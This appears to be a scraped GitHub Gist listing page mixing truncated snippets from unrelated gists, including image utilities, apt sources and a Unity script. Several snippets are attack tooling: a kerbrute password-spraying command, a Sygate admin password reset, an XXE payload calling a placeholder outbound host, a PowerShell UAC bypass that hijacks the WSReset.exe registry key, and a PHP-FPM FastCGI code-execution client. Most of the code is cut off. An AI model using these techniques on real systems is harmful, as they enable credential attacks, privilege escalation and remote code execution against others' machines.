With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| static void Resize(string filepath, int quality = 75, string watermarkpath = @"C:\Users\ddd\Desktop\123\water.png") | |
| { | |
| using (var water = File.OpenRead(watermarkpath)) | |
| { | |
| SKBitmap waterBitmap = SKBitmap.Decode(water); | |
| using (var file = File.OpenRead(filepath)) | |
| { | |
| var rawLength = file.Length; | |
| if (filepath.EndsWith("gif")) |
Y4er
/ kerberos_attacks_cheatsheet.md
Created
November 12, 2020 01:55
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
Y4er
/ resetpass.bat
Created
October 27, 2020 08:25
— forked from SuzuneToumyou/resetpass.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| setlocal | |
| set CATALINA_HOME=%CD%\..\tomcat | |
| set JRE_HOME=%CD%\..\jre | |
| "%JRE_HOME%\bin\java.exe" -Xms64m -Xmx256m -XX:MinHeapFreeRatio=30 -XX:MaxHeapFreeRatio=40 -classpath "%CD%\..\bin\inst.jar;%CD%\..\bin\inst-res.jar" -Dcatalina.home="%CATALINA_HOME%" -Djava.library.path="%CATALINA_HOME%\bin;%CATALINA_HOME%\..\ASA\win32" com.sygate.scm.tools.DatabaseFrame setpassword admin admin | |
| endlocal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse | |
| deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse | |
| deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse | |
| deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse | |
| deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse | |
| deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse | |
| deb http://mirrors.aliyun.com/ubuntu/ focal-proposed main restricted universe multiverse |
遇到了win10的环境就找了下bypassuac的。
win10 1909 18363.535 Pro
利用微软提供的sigcheck.exe签名检查工具发现 C:\Windows\System32\WSReset.exe 存在autoElevate属性为true
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-WSResetBypass { | |
| Param ( | |
| [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe" | |
| ) | |
| $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" | |
| $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" | |
| New-Item $CommandPath -Force | Out-Null | |
| New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null | |
| Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null |
Y4er
/ fpm.py
Created
November 25, 2019 01:05
— forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import random | |
| import argparse | |
| import sys | |
| from io import BytesIO | |
| # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client | |
| PY2 = True if sys.version_info.major == 2 else False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import os | |
| from datetime import datetime | |
| COUNT = 0 | |
| def getimg(post, rule): | |
| with open(post, 'r', encoding='utf-8') as f: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Collections; | |
| using System.Collections.Generic; | |
| using UnityEngine; | |
| using VRStandardAssets.Utils; | |
| public class Example : MonoBehaviour { | |
| VRInteractiveItem vritem; | |
| //动态添加vritem | |
| void Awake(){ | |
| if (!gameObject.GetComponent <VRInteractiveItem> ()) { |
NewerOlder